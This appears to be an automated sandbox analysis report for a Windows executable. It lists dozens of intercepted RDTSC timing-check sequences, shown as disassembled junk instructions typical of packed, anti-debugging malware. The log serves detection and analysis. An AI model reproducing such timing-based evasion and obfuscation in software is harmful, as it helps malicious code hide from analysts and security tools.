Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C0011B second address: 4C001C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 799E8DE2h 0x00000008 jmp 00007FD1807ED553h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 push edi 0x00000013 mov bl, cl 0x00000015 pop edi 0x00000016 mov si, A953h 0x0000001a popad 0x0000001b xchg eax, ebp 0x0000001c jmp 00007FD1807ED556h 0x00000021 mov ebp, esp 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007FD1807ED54Eh 0x0000002a sub ah, 00000008h 0x0000002d jmp 00007FD1807ED54Bh 0x00000032 popfd 0x00000033 mov ebx, eax 0x00000035 popad 0x00000036 push dword ptr [ebp+04h] 0x00000039 jmp 00007FD1807ED552h 0x0000003e push dword ptr [ebp+0Ch] 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 pushfd 0x00000045 jmp 00007FD1807ED54Dh 0x0000004a sub si, 47D6h 0x0000004f jmp 00007FD1807ED551h 0x00000054 popfd 0x00000055 pushad 0x00000056 popad 0x00000057 popad 0x00000058 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C20C31 second address: 4C20C85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD180B5C167h 0x00000009 xor ax, C1DEh 0x0000000e jmp 00007FD180B5C169h 0x00000013 popfd 0x00000014 jmp 00007FD180B5C160h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C20C85 second address: 4C20CA2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED559h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C20CA2 second address: 4C20CA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C20CA7 second address: 4C20CC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bl, 22h 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD1807ED552h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C2078A second address: 4C20843 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C169h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FD180B5C167h 0x00000011 adc ax, F5FEh 0x00000016 jmp 00007FD180B5C169h 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007FD180B5C160h 0x00000022 add si, 5CF8h 0x00000027 jmp 00007FD180B5C15Bh 0x0000002c popfd 0x0000002d popad 0x0000002e xchg eax, ebp 0x0000002f pushad 0x00000030 pushfd 0x00000031 jmp 00007FD180B5C164h 0x00000036 and ax, B758h 0x0000003b jmp 00007FD180B5C15Bh 0x00000040 popfd 0x00000041 mov ebx, esi 0x00000043 popad 0x00000044 mov ebp, esp 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007FD180B5C161h 0x0000004d rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C2070F second address: 4C20713 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C20713 second address: 4C20717 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C20717 second address: 4C2071D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C2071D second address: 4C20723 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C20723 second address: 4C20727 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C20727 second address: 4C2073D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov ecx, 0747C2EBh 0x00000011 mov ax, A2C7h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C204A3 second address: 4C204A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C204A9 second address: 4C204AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C204AD second address: 4C204B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C204B1 second address: 4C204E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov di, cx 0x0000000d mov si, CACFh 0x00000011 popad 0x00000012 xchg eax, ebp 0x00000013 jmp 00007FD180B5C162h 0x00000018 mov ebp, esp 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d pushad 0x0000001e popad 0x0000001f mov ax, dx 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C204E1 second address: 4C204F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 2354h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov bx, ax 0x00000011 mov eax, 52669397h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C204F8 second address: 4C204FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C204FE second address: 4C20502 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C20502 second address: 4C20506 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C30227 second address: 4C30254 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED559h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD1807ED54Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C30254 second address: 4C302B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C161h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov si, di 0x0000000e mov edi, 29700ACEh 0x00000013 popad 0x00000014 xchg eax, ebp 0x00000015 jmp 00007FD180B5C165h 0x0000001a mov ebp, esp 0x0000001c jmp 00007FD180B5C15Eh 0x00000021 pop ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FD180B5C167h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C70021 second address: 4C7008E instructions: 0x00000000 rdtsc 0x00000002 mov edi, eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov cl, FCh 0x00000008 popad 0x00000009 push ebx 0x0000000a jmp 00007FD1807ED54Ch 0x0000000f mov dword ptr [esp], ebp 0x00000012 pushad 0x00000013 movzx esi, di 0x00000016 pushfd 0x00000017 jmp 00007FD1807ED553h 0x0000001c and al, 0000001Eh 0x0000001f jmp 00007FD1807ED559h 0x00000024 popfd 0x00000025 popad 0x00000026 mov ebp, esp 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FD1807ED558h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C7008E second address: 4C70092 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C70092 second address: 4C70098 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C70098 second address: 4C700C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, ax 0x00000006 call 00007FD180B5C168h 0x0000000b pop ecx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov cx, 60F9h 0x00000017 mov di, si 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C40392 second address: 4C403E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop esi 0x00000005 mov dh, DEh 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FD1807ED558h 0x00000012 add esi, 5C138878h 0x00000018 jmp 00007FD1807ED54Bh 0x0000001d popfd 0x0000001e mov ecx, 709093AFh 0x00000023 popad 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FD1807ED550h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C403E2 second address: 4C40431 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C15Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov edx, esi 0x0000000d call 00007FD180B5C160h 0x00000012 mov dl, al 0x00000014 pop edi 0x00000015 popad 0x00000016 mov ebp, esp 0x00000018 jmp 00007FD180B5C15Ah 0x0000001d mov eax, dword ptr [ebp+08h] 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FD180B5C167h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C40431 second address: 4C4046F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, dx 0x00000006 pushfd 0x00000007 jmp 00007FD1807ED54Bh 0x0000000c add ecx, 5E5BE85Eh 0x00000012 jmp 00007FD1807ED559h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b and dword ptr [eax], 00000000h 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C4046F second address: 4C40473 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C40473 second address: 4C40479 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C40479 second address: 4C4047F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C4047F second address: 4C40483 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C40483 second address: 4C40487 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C40487 second address: 4C404BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and dword ptr [eax+04h], 00000000h 0x0000000c jmp 00007FD1807ED558h 0x00000011 pop ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FD1807ED54Ah 0x0000001b rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C404BA second address: 4C404BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C404BE second address: 4C404C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C20608 second address: 4C2067E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, di 0x00000006 mov bh, 37h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FD180B5C15Dh 0x00000011 xchg eax, ebp 0x00000012 pushad 0x00000013 mov cl, F1h 0x00000015 pushfd 0x00000016 jmp 00007FD180B5C169h 0x0000001b jmp 00007FD180B5C15Bh 0x00000020 popfd 0x00000021 popad 0x00000022 mov ebp, esp 0x00000024 jmp 00007FD180B5C166h 0x00000029 pop ebp 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FD180B5C167h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C2067E second address: 4C20684 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C20684 second address: 4C20688 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C606C5 second address: 4C606C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C606C9 second address: 4C606CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C606CF second address: 4C606D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C606D4 second address: 4C606FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007FD180B5C160h 0x00000009 pop esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FD180B5C15Ah 0x00000017 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C606FB second address: 4C6070A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED54Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C6070A second address: 4C60722 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD180B5C164h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C60722 second address: 4C6075B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov esi, 65D86F6Fh 0x00000011 pushfd 0x00000012 jmp 00007FD1807ED554h 0x00000017 sbb ecx, 555AAF98h 0x0000001d jmp 00007FD1807ED54Bh 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C6075B second address: 4C60761 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C60761 second address: 4C60765 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C60765 second address: 4C60795 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C15Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007FD180B5C166h 0x00000012 xchg eax, ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C60795 second address: 4C60799 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C60799 second address: 4C6079F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C6079F second address: 4C607BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED554h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C607BE second address: 4C607C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C607C2 second address: 4C607C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C607C6 second address: 4C607CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C607CC second address: 4C6081B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED54Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b jmp 00007FD1807ED554h 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FD1807ED550h 0x00000017 or ecx, 61135848h 0x0000001d jmp 00007FD1807ED54Bh 0x00000022 popfd 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C6081B second address: 4C608A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [76FB65FCh] 0x0000000b pushad 0x0000000c call 00007FD180B5C162h 0x00000011 mov ch, 39h 0x00000013 pop edi 0x00000014 pushfd 0x00000015 jmp 00007FD180B5C15Ch 0x0000001a or ecx, 16A3FDD8h 0x00000020 jmp 00007FD180B5C15Bh 0x00000025 popfd 0x00000026 popad 0x00000027 test eax, eax 0x00000029 jmp 00007FD180B5C166h 0x0000002e je 00007FD1F2E2F248h 0x00000034 jmp 00007FD180B5C160h 0x00000039 mov ecx, eax 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007FD180B5C167h 0x00000042 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C608A5 second address: 4C608CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED559h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor eax, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C608CB second address: 4C608CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C608CF second address: 4C608D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C608D5 second address: 4C608FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C15Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and ecx, 1Fh 0x0000000c pushad 0x0000000d push esi 0x0000000e mov ecx, edx 0x00000010 pop edx 0x00000011 popad 0x00000012 ror eax, cl 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FD180B5C15Bh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C608FE second address: 4C60902 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C60902 second address: 4C60908 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C60908 second address: 4C6094B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD1807ED552h 0x00000008 call 00007FD1807ED552h 0x0000000d pop ecx 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 leave 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FD1807ED553h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C6094B second address: 4C6094F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C6094F second address: 4C60955 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C10034 second address: 4C10048 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD180B5C160h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C10148 second address: 4C10177 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD1807ED558h 0x00000009 and cx, D088h 0x0000000e jmp 00007FD1807ED54Bh 0x00000013 popfd 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C10177 second address: 4C1020A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007FD180B5C15Fh 0x0000000d xchg eax, esi 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FD180B5C164h 0x00000015 add eax, 7E982618h 0x0000001b jmp 00007FD180B5C15Bh 0x00000020 popfd 0x00000021 push esi 0x00000022 pushad 0x00000023 popad 0x00000024 pop ebx 0x00000025 popad 0x00000026 mov esi, dword ptr [ebp+08h] 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007FD180B5C15Dh 0x00000032 adc cx, 87B6h 0x00000037 jmp 00007FD180B5C161h 0x0000003c popfd 0x0000003d pushfd 0x0000003e jmp 00007FD180B5C160h 0x00000043 sbb ax, AAD8h 0x00000048 jmp 00007FD180B5C15Bh 0x0000004d popfd 0x0000004e popad 0x0000004f rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C1020A second address: 4C10280 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edi 0x00000005 mov di, F3C6h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esp 0x0000000d jmp 00007FD1807ED54Ah 0x00000012 mov dword ptr [esp], edi 0x00000015 pushad 0x00000016 mov eax, 48F1454Dh 0x0000001b pushfd 0x0000001c jmp 00007FD1807ED54Ah 0x00000021 and ch, 00000068h 0x00000024 jmp 00007FD1807ED54Bh 0x00000029 popfd 0x0000002a popad 0x0000002b test esi, esi 0x0000002d jmp 00007FD1807ED556h 0x00000032 je 00007FD1F2B0B8FEh 0x00000038 jmp 00007FD1807ED550h 0x0000003d cmp dword ptr [esi+08h], DDEEDDEEh 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 popad 0x0000004a rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C10280 second address: 4C1029D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C169h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C1029D second address: 4C102C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED551h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FD1F2B0B8BFh 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FD1807ED54Ah 0x00000017 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C102C5 second address: 4C102CF instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
